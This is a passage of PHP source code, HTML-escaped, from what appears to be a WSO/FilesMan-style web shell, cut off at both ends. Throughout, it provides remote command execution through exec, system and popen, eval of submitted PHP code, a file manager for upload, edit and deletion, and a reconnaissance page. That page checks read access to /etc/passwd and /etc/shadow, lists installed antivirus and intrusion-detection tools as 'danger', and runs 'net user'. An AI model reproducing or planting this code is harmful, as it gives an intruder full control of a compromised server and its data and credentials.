         '&amp;lt;td&amp;gt;:&amp;lt;nobr&amp;gt;'.substr(@php_uname(), 0, 120).'  &amp;lt;a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank"&amp;gt;[Google]&amp;lt;/a&amp;gt; &amp;lt;a href="'.$millink.'" target=_blank&amp;gt;[milw0rm]&amp;lt;/a&amp;gt;&amp;lt;/nobr&amp;gt;&amp;lt;br&amp;gt;:'.$uid.' ( '.$user.' ) &amp;lt;span&amp;gt;Group:&amp;lt;/span&amp;gt; '.$gid.' ( '.$group.' )&amp;lt;br&amp;gt;:'.@phpversion().' &amp;lt;span&amp;gt;Safe mode:&amp;lt;/span&amp;gt; '.($GLOBALS['safe_mode']?'&amp;lt;font color=red&amp;gt;ON&amp;lt;/font&amp;gt;':'&amp;lt;font color=&amp;lt;?=$color?&amp;gt;&amp;lt;b&amp;gt;OFF&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;').' &amp;lt;a href=# onclick="g(\'Php\',null,null,\'info\')"&amp;gt;[ phpinfo ]&amp;lt;/a&amp;gt; &amp;lt;span&amp;gt;Datetime:&amp;lt;/span&amp;gt; '.date('Y-m-d H:i:s').'&amp;lt;br&amp;gt;:'.viewSize($totalSpace).' &amp;lt;span&amp;gt;Free:&amp;lt;/span&amp;gt; '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)&amp;lt;br&amp;gt;:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' &amp;lt;a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')"&amp;gt;[ home ]&amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;:'.$drives.'&amp;lt;/td&amp;gt;'. 
         '&amp;lt;td width=1 align=right&amp;gt;&amp;lt;nobr&amp;gt;&amp;lt;select onchange="g(null,null,null,null,null,this.value)"&amp;gt;&amp;lt;optgroup label="Page charset"&amp;gt;'.$opt_charsets.'&amp;lt;/optgroup&amp;gt;&amp;lt;/select&amp;gt;&amp;lt;br&amp;gt;&amp;lt;span&amp;gt;Server IP:&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;'.gethostbyname($_SERVER["HTTP_HOST"]).'&amp;lt;br&amp;gt;&amp;lt;span&amp;gt;Client IP:&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;'.$_SERVER['REMOTE_ADDR'].'&amp;lt;/nobr&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;'. 
         '&amp;lt;table cellpadding=3 cellspacing=0 width=100%&amp;gt;&amp;lt;tr&amp;gt;'.$menu.'&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;div style="margin:5"&amp;gt;'; 
} 

function printFooter() { 
    $is_writable = is_writable($GLOBALS['cwd'])?"&amp;lt;font color=green&amp;gt;[ Writeable ]&amp;lt;/font&amp;gt;":"&amp;lt;font color=red&amp;gt;[ Not writable ]&amp;lt;/font&amp;gt;"; 
?&amp;gt; 
&amp;lt;/div&amp;gt; 
&amp;lt;table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%"&amp;gt; 
    &amp;lt;tr&amp;gt; 
        &amp;lt;td&amp;gt;&amp;lt;form onsubmit="g(null,this.c.value);return false;"&amp;gt;&amp;lt;span&amp;gt;Change dir:&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;input class="toolsInp" type=text name=c value="&amp;lt;?=htmlspecialchars($GLOBALS['cwd']);?&amp;gt;"&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;/td&amp;gt; 
        &amp;lt;td&amp;gt;&amp;lt;form onsubmit="g('FilesTools',null,this.f.value);return false;"&amp;gt;&amp;lt;span&amp;gt;Read file:&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;input class="toolsInp" type=text name=f&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;/td&amp;gt; 
    &amp;lt;/tr&amp;gt; 
    &amp;lt;tr&amp;gt; 
        &amp;lt;td&amp;gt;&amp;lt;form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"&amp;gt;&amp;lt;span&amp;gt;Make dir:&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;input class="toolsInp" type=text name=d&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;?=$is_writable?&amp;gt;&amp;lt;/td&amp;gt; 
        &amp;lt;td&amp;gt;&amp;lt;form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"&amp;gt;&amp;lt;span&amp;gt;Make file:&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;input class="toolsInp" type=text name=f&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;?=$is_writable?&amp;gt;&amp;lt;/td&amp;gt; 
    &amp;lt;/tr&amp;gt; 
    &amp;lt;tr&amp;gt; 
        &amp;lt;td&amp;gt;&amp;lt;form onsubmit="g('Console',null,this.c.value);return false;"&amp;gt;&amp;lt;span&amp;gt;Execute:&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;input class="toolsInp" type=text name=c value=""&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;/td&amp;gt; 
        &amp;lt;td&amp;gt;&amp;lt;form method='post' ENCTYPE='multipart/form-data'&amp;gt; 
        &amp;lt;input type=hidden name=a value='FilesMAn'&amp;gt; 
        &amp;lt;input type=hidden name=c value='&amp;lt;?=htmlspecialchars($GLOBALS['cwd'])?&amp;gt;'&amp;gt; 
        &amp;lt;input type=hidden name=p1 value='uploadFile'&amp;gt; 
        &amp;lt;input type=hidden name=charset value='&amp;lt;?=isset($_POST['charset'])?$_POST['charset']:''?&amp;gt;'&amp;gt; 
        &amp;lt;span&amp;gt;Upload file:&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;input class="toolsInp" type=file name=f&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;?=$is_writable?&amp;gt;&amp;lt;/td&amp;gt; 
    &amp;lt;/tr&amp;gt; 

&amp;lt;/table&amp;gt; 
&amp;lt;/div&amp;gt; 
&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt; 
&amp;lt;?php 
} 
if ( !function_exists("posix_getpwuid") &amp;amp;&amp;amp; (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") &amp;amp;&amp;amp; (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
function ex($in) { 
    $out = ''; 
    if(function_exists('exec')) { 
        @exec($in,$out); 
        $out = @join("\n",$out); 
    }elseif(function_exists('passthru')) { 
        ob_start(); 
        @passthru($in); 
        $out = ob_get_clean(); 
    }elseif(function_exists('system')) { 
        ob_start(); 
        @system($in); 
        $out = ob_get_clean(); 
    }elseif(function_exists('shell_exec')) { 
        $out = shell_exec($in); 
    }elseif(is_resource($f = @popen($in,"r"))) { 
        $out = ""; 
        while(!@feof($f)) 
            $out .= fread($f,1024); 
        pclose($f); 
    } 
    return $out; 
} 
function viewSize($s) { 
    if($s &amp;gt;= 1073741824) 
        return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 
    elseif($s &amp;gt;= 1048576) 
        return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 
    elseif($s &amp;gt;= 1024) 
        return sprintf('%1.2f', $s / 1024 ) . ' KB'; 
    else 
        return $s . ' B'; 
} 

function perms($p) { 
    if (($p &amp;amp; 0xC000) == 0xC000)$i = 's'; 
    elseif (($p &amp;amp; 0xA000) == 0xA000)$i = 'l'; 
    elseif (($p &amp;amp; 0x8000) == 0x8000)$i = '-'; 
    elseif (($p &amp;amp; 0x6000) == 0x6000)$i = 'b'; 
    elseif (($p &amp;amp; 0x4000) == 0x4000)$i = 'd'; 
    elseif (($p &amp;amp; 0x2000) == 0x2000)$i = 'c'; 
    elseif (($p &amp;amp; 0x1000) == 0x1000)$i = 'p'; 
    else $i = 'u'; 
    $i .= (($p &amp;amp; 0x0100) ? 'r' : '-'); 
    $i .= (($p &amp;amp; 0x0080) ? 'w' : '-'); 
    $i .= (($p &amp;amp; 0x0040) ? (($p &amp;amp; 0x0800) ? 's' : 'x' ) : (($p &amp;amp; 0x0800) ? 'S' : '-')); 
    $i .= (($p &amp;amp; 0x0020) ? 'r' : '-'); 
    $i .= (($p &amp;amp; 0x0010) ? 'w' : '-'); 
    $i .= (($p &amp;amp; 0x0008) ? (($p &amp;amp; 0x0400) ? 's' : 'x' ) : (($p &amp;amp; 0x0400) ? 'S' : '-')); 
    $i .= (($p &amp;amp; 0x0004) ? 'r' : '-'); 
    $i .= (($p &amp;amp; 0x0002) ? 'w' : '-'); 
    $i .= (($p &amp;amp; 0x0001) ? (($p &amp;amp; 0x0200) ? 't' : 'x' ) : (($p &amp;amp; 0x0200) ? 'T' : '-')); 
    return $i; 
} 
function viewPermsColor($f) {  
    if (!@is_readable($f)) 
        return '&amp;lt;font color=#FF0000&amp;gt;&amp;lt;b&amp;gt;'.perms(@fileperms($f)).'&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;'; 
    elseif (!@is_writable($f)) 
        return '&amp;lt;font color=white&amp;gt;&amp;lt;b&amp;gt;'.perms(@fileperms($f)).'&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;'; 
    else 
        return '&amp;lt;font color=#00BB00&amp;gt;&amp;lt;b&amp;gt;'.perms(@fileperms($f)).'&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;'; 
} 
if(!function_exists("scandir")) { 
    function scandir($dir) { 
        $dh  = opendir($dir); 
        while (false !== ($filename = readdir($dh))) { 
            $files[] = $filename; 
        } 
        return $files; 
    } 
} 
function which($p) { 
    $path = ex('which '.$p); 
    if(!empty($path)) 
        return $path; 
    return false; 
} 
function actionSecInfo() { 
    printHeader(); 
    echo '&amp;lt;h1&amp;gt;Server security information&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;'; 
    function showSecParam($n, $v) { 
        $v = trim($v); 
        if($v) { 
            echo '&amp;lt;span&amp;gt;'.$n.': &amp;lt;/span&amp;gt;'; 
            if(strpos($v, "\n") === false) 
                echo $v.'&amp;lt;br&amp;gt;'; 
            else 
                echo '&amp;lt;pre class=ml1&amp;gt;'.$v.'&amp;lt;/pre&amp;gt;'; 
        } 
    } 
     
    showSecParam('Server software', @getenv('SERVER_SOFTWARE')); 
    showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); 
    showSecParam('Open base dir', @ini_get('open_basedir')); 
    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 
    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 
    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); 
    $temp=array(); 
    if(function_exists('mysql_get_client_info')) 
        $temp[] = "MySql (".mysql_get_client_info().")"; 
    if(function_exists('mssql_connect')) 
        $temp[] = "MSSQL"; 
    if(function_exists('pg_connect')) 
        $temp[] = "PostgreSQL"; 
    if(function_exists('oci_connect')) 
        $temp[] = "Oracle"; 
    showSecParam('Supported databases', implode(', ', $temp)); 
    echo '&amp;lt;br&amp;gt;'; 
     
    if( $GLOBALS['os'] == 'nix' ) { 
        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 
        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); 
        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 
        showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes &amp;lt;a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'&amp;gt;[view]&amp;lt;/a&amp;gt;":'no'); 
        showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes &amp;lt;a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'&amp;gt;[view]&amp;lt;/a&amp;gt;":'no'); 
        showSecParam('OS version', @file_get_contents('/proc/version')); 
        showSecParam('Distr name', @file_get_contents('/etc/issue.net')); 
        if(!$GLOBALS['safe_mode']) { 
            echo '&amp;lt;br&amp;gt;'; 
            $temp=array(); 
            foreach ($userful as $item) 
                if(which($item)){$temp[]=$item;} 
            showSecParam('Userful', implode(', ',$temp)); 
            $temp=array(); 
            foreach ($danger as $item) 
                if(which($item)){$temp[]=$item;} 
            showSecParam('Danger', implode(', ',$temp)); 
            $temp=array(); 
            foreach ($downloaders as $item)  
                if(which($item)){$temp[]=$item;} 
            showSecParam('Downloaders', implode(', ',$temp)); 
            echo '&amp;lt;br/&amp;gt;'; 
            showSecParam('Hosts', @file_get_contents('/etc/hosts')); 
            showSecParam('HDD space', ex('df -h')); 
            showSecParam('Mount options', @file_get_contents('/etc/fstab')); 
        } 
    } else { 
        showSecParam('OS Version',ex('ver'));  
        showSecParam('Account Settings',ex('net accounts'));  
        showSecParam('User Accounts',ex('net user')); 
    } 
    echo '&amp;lt;/div&amp;gt;'; 
    printFooter(); 
} 

function actionPhp() { 
    if( isset($_POST['ajax']) ) { 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
        ob_start(); 
        eval($_POST['p1']); 
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; 
        echo strlen($temp), "\n", $temp; 
        exit;  
    } 
    printHeader(); 
    if( isset($_POST['p2']) &amp;amp;&amp;amp; ($_POST['p2'] == 'info') ) { 
        echo '&amp;lt;h1&amp;gt;PHP info&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;'; 
        ob_start(); 
        phpinfo(); 
        $tmp = ob_get_clean(); 
        $tmp = preg_replace('!body {.*}!msiU','',$tmp); 
        $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); 
        $tmp = preg_replace('!h1!msiU','h2',$tmp); 
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); 
        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); 
        echo $tmp; 
        echo '&amp;lt;/div&amp;gt;&amp;lt;br&amp;gt;'; 
    } 
    if(empty($_POST['ajax'])&amp;amp;&amp;amp;!empty($_POST['p1'])) 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
        echo '&amp;lt;h1&amp;gt;Execution PHP-code&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;&amp;lt;form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"&amp;gt;&amp;lt;textarea name=code class=bigarea id=PhpCode&amp;gt;'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'&amp;lt;/textarea&amp;gt;&amp;lt;input type=submit value=Eval style="margin-top:5px"&amp;gt;'; 
    echo ' &amp;lt;input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'&amp;gt; send using AJAX&amp;lt;/form&amp;gt;&amp;lt;pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1&amp;gt;'; 
    if(!empty($_POST['p1'])) { 
        ob_start(); 
        eval($_POST['p1']); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo '&amp;lt;/pre&amp;gt;&amp;lt;/div&amp;gt;'; 
    printFooter(); 
} 

function actionFilesMan() { 
    printHeader(); 
    echo '&amp;lt;h1&amp;gt;File manager&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;'; 
    if(isset($_POST['p1'])) { 
        switch($_POST['p1']) { 
            case 'uploadFile': 
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) 
                    echo "Can't upload file!"; 
                break; 
                break; 
            case 'mkdir': 
                if(!@mkdir($_POST['p2'])) 
                    echo "Can't create new dir"; 
                break; 
            case 'delete': 
                function deleteDir($path) { 
                    $path = (substr($path,-1)=='/') ? $path:$path.'/'; 
                    $dh  = opendir($path); 
                    while ( ($item = readdir($dh) ) !== false) { 
                        $item = $path.$item; 
                        if ( (basename($item) == "..") || (basename($item) == ".") ) 
                            continue; 
                        $type = filetype($item); 
                        if ($type == "dir") 
                            deleteDir($item); 
                        else 
                            @unlink($item); 
                    } 
                    closedir($dh); 
                    rmdir($path); 
                } 
                if(is_array(@$_POST['f'])) 
                    foreach($_POST['f'] as $f) { 
                        $f = urldecode($f); 
                        if(is_dir($f)) 
                            deleteDir($f); 
                        else 
                            @unlink($f); 
                    } 
                break; 
            case 'paste': 
                if($_SESSION['act'] == 'copy') { 
                    function copy_paste($c,$s,$d){ 
                        if(is_dir($c.$s)){ 
                            mkdir($d.$s); 
                            $h = opendir($c.$s); 
                            while (($f = readdir($h)) !== false) 
                                if (($f != ".") and ($f != "..")) { 
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
                                } 
                        } elseif(is_file($c.$s)) { 
                            @copy($c.$s, $d.$s); 
                        } 
                    } 
                    foreach($_SESSION['f'] as $f) 
                        copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                     
                } elseif($_SESSION['act'] == 'move') { 
                    function move_paste($c,$s,$d){ 
                        if(is_dir($c.$s)){ 
                            mkdir($d.$s); 
                            $h = opendir($c.$s); 
                            while (($f = readdir($h)) !== false) 
                                if (($f != ".") and ($f != "..")) { 
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
                                } 
                        } elseif(is_file($c.$s)) { 
                            @copy($c.$s, $d.$s); 
                        } 
                    } 
                    foreach($_SESSION['f'] as $f) 
                        @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); 
                } 
                unset($_SESSION['f']); 
                break; 
            default: 
                if(!empty($_POST['p1']) &amp;amp;&amp;amp; (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { 
                    $_SESSION['act'] = @$_POST['p1']; 
                    $_SESSION['f'] = @$_POST['f']; 
                    foreach($_SESSION['f'] as $k =&amp;gt; $f) 
                        $_SESSION['f'][$k] = urldecode($f); 
                    $_SESSION['cwd'] = @$_POST['c']; 
                } 
                break; 
        } 
        echo '&amp;lt;script&amp;gt;document.mf.p1.value="";document.mf.p2.value="";&amp;lt;/script&amp;gt;'; 
    } 
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); 
    if($dirContent === false) {    echo 'Can\'t open this folder!'; return;    }
    global $sort; 
    $sort = array('name', 1); 
    if(!empty($_POST['p1'])) { 
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) 
            $sort = array($match[1], (int)$match[2]); 
    } 
?&amp;gt; 
&amp;lt;script&amp;gt; 
    function sa() { 
        for(i=0;i&amp;lt;document.files.elements.length;i++) 
            if(document.files.elements[i].type == 'checkbox') 
                document.files.elements[i].checked = document.files.elements[0].checked; 
    } 
&amp;lt;/script&amp;gt; 
&amp;lt;table width='100%' class='main' cellspacing='0' cellpadding='2'&amp;gt; 
&amp;lt;form name=files method=post&amp;gt; 
&amp;lt;?php 
    echo "&amp;lt;tr&amp;gt;&amp;lt;th width='13px'&amp;gt;&amp;lt;input type=checkbox onclick='sa()' class=chkbx&amp;gt;&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;&amp;lt;a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'&amp;gt;Name&amp;lt;/a&amp;gt;&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;&amp;lt;a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'&amp;gt;Size&amp;lt;/a&amp;gt;&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;&amp;lt;a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'&amp;gt;Modify&amp;lt;/a&amp;gt;&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Owner/Group&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;&amp;lt;a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'&amp;gt;Permissions&amp;lt;/a&amp;gt;&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Actions&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;"; 
    $dirs = $files = $links = array(); 
    $n = count($dirContent); 
    for($i=0;$i&amp;lt;$n;$i++) { 
        $ow = @posix_getpwuid(@fileowner($dirContent[$i])); 
        $gr = @posix_getgrgid(@filegroup($dirContent[$i])); 
        $tmp = array('name' =&amp;gt; $dirContent[$i], 
                     'path' =&amp;gt; $GLOBALS['cwd'].$dirContent[$i], 
                     'modify' =&amp;gt; date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 
                     'perms' =&amp;gt; viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
                     'size' =&amp;gt; @filesize($GLOBALS['cwd'].$dirContent[$i]), 
                     'owner' =&amp;gt; $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 
                     'group' =&amp;gt; $gr['name']?$gr['name']:@filegroup($dirContent[$i]) 
                    ); 
        if(@is_file($GLOBALS['cwd'].$dirContent[$i])) 
            $files[] = array_merge($tmp, array('type' =&amp;gt; 'file')); 
        elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) 
            $links[] = array_merge($tmp, array('type' =&amp;gt; 'link')); 
        elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&amp;amp;&amp;amp; ($dirContent[$i] != ".")) 
            $dirs[] = array_merge($tmp, array('type' =&amp;gt; 'dir')); 
    } 
    $GLOBALS['sort'] = $sort; 
    function cmp($a, $b) { 
        if($GLOBALS['sort'][0] != 'size') 
            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); 
        else 
            return (($a['size'] &amp;lt; $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); 
    } 
    usort($files, "cmp"); 
    usort($dirs, "cmp"); 
    usort($links, "cmp"); 
    $files = array_merge($dirs, $links, $files); 
    $l = 0; 
    foreach($files as $f) { 
        echo '&amp;lt;tr'.($l?' class=l1':'').'&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')"&amp;gt;'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"&amp;gt;&amp;lt;b&amp;gt;[ '.htmlspecialchars($f['name']).' ]&amp;lt;/b&amp;gt;').'&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;'.$f['modify'].'&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;'.$f['owner'].'/'.$f['group'].'&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')"&amp;gt;'.$f['perms'] 
            .'&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')"&amp;gt;R&amp;lt;/a&amp;gt; &amp;lt;a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')"&amp;gt;T&amp;lt;/a&amp;gt;'.(($f['type']=='file')?' &amp;lt;a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')"&amp;gt;E&amp;lt;/a&amp;gt; &amp;lt;a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')"&amp;gt;D&amp;lt;/a&amp;gt;':'').'&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;'; 
        $l = $l?0:1; 
    } 
    ?&amp;gt; 
    &amp;lt;tr&amp;gt;&amp;lt;td colspan=7&amp;gt; 
    &amp;lt;input type=hidden name=a value='FilesMan'&amp;gt; 
    &amp;lt;input type=hidden name=c value='&amp;lt;?=htmlspecialchars($GLOBALS['cwd'])?&amp;gt;'&amp;gt; 
    &amp;lt;input type=hidden name=charset value='&amp;lt;?=isset($_POST['charset'])?$_POST['charset']:''?&amp;gt;'&amp;gt; 
    &amp;lt;select name='p1'&amp;gt;&amp;lt;option value='copy'&amp;gt;Copy&amp;lt;/option&amp;gt;&amp;lt;option value='move'&amp;gt;Move&amp;lt;/option&amp;gt;&amp;lt;option value='delete'&amp;gt;Delete&amp;lt;/option&amp;gt;&amp;lt;?php if(!empty($_SESSION['act'])&amp;amp;&amp;amp;@count($_SESSION['f'])){?&amp;gt;&amp;lt;option value='paste'&amp;gt;Paste&amp;lt;/option&amp;gt;&amp;lt;?php }?&amp;gt;&amp;lt;/select&amp;gt;&amp;amp;nbsp;&amp;lt;input type="submit" value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt; 
    &amp;lt;/form&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/div&amp;gt; 
    &amp;lt;?php 
    printFooter(); 
} 

function actionStringTools() { 
    if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} 
    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i&amp;lt;strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} 
    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i&amp;lt;strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}} 
    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i&amp;lt;strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} 
     
    if(isset($_POST['ajax'])) { 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
        ob_start(); 
        if(function_exists($_POST['p1'])) 
            echo $_POST['p1']($_POST['p2']); 
        $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; 
        echo strlen($temp), "\n", $temp; 
        exit; 
    } 
    printHeader(); 
    echo '&amp;lt;h1&amp;gt;String conversions&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;'; 
    $stringTools = array( 
        'Base64 encode' =&amp;gt; 'base64_encode', 
        'Base64 decode' =&amp;gt; 'base64_decode', 
        'Url encode' =&amp;gt; 'urlencode', 
        'Url decode' =&amp;gt; 'urldecode', 
        'Full urlencode' =&amp;gt; 'full_urlencode', 
        'md5 hash' =&amp;gt; 'md5', 
        'sha1 hash' =&amp;gt; 'sha1', 
        'crypt' =&amp;gt; 'crypt', 
        'CRC32' =&amp;gt; 'crc32', 
        'ASCII to HEX' =&amp;gt; 'ascii2hex', 
        'HEX to ASCII' =&amp;gt; 'hex2ascii', 
        'HEX to DEC' =&amp;gt; 'hexdec', 
        'HEX to BIN' =&amp;gt; 'hex2bin', 
        'DEC to HEX' =&amp;gt; 'dechex', 
        'DEC to BIN' =&amp;gt; 'decbin', 
        'BIN to HEX' =&amp;gt; 'bin2hex', 
        'BIN to DEC' =&amp;gt; 'bindec',         
        'String to lower case' =&amp;gt; 'strtolower', 
        'String to upper case' =&amp;gt; 'strtoupper', 
        'Htmlspecialchars' =&amp;gt; 'htmlspecialchars', 
        'String length' =&amp;gt; 'strlen', 
    ); 
    if(empty($_POST['ajax'])&amp;amp;&amp;amp;!empty($_POST['p1'])) 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
    echo "&amp;lt;form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'&amp;gt;&amp;lt;select name='selectTool'&amp;gt;"; 
    foreach($stringTools as $k =&amp;gt; $v) 
        echo "&amp;lt;option value='".htmlspecialchars($v)."'&amp;gt;".$k."&amp;lt;/option&amp;gt;"; 
        echo "&amp;lt;/select&amp;gt;&amp;lt;input type='submit' value='&amp;gt;&amp;gt;'/&amp;gt; &amp;lt;input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."&amp;gt; send using AJAX&amp;lt;br&amp;gt;&amp;lt;textarea name='input' style='margin-top:5px' class=bigarea&amp;gt;".htmlspecialchars(@$_POST['p2'])."&amp;lt;/textarea&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'&amp;gt;"; 
